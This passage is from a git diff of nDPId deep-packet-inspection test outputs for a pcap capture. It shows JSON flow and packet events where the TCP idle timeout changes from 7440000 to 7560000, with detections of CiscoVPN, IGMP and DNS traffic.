{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} diff --git a/test/results/anyconnect-vpn.pcap.out b/test/results/anyconnect-vpn.pcap.out index cd1c81cc2..f9160e1d0 100644 --- a/test/results/anyconnect-vpn.pcap.out +++ b/test/results/anyconnect-vpn.pcap.out 
@@ -1,16 +1,16 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569687240992} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} 
00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"thread_ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="} 00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -20,14 +20,14 @@ 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="} 00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="} 
00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="} 
00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="} 
@@ -44,26 +44,26 @@ 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 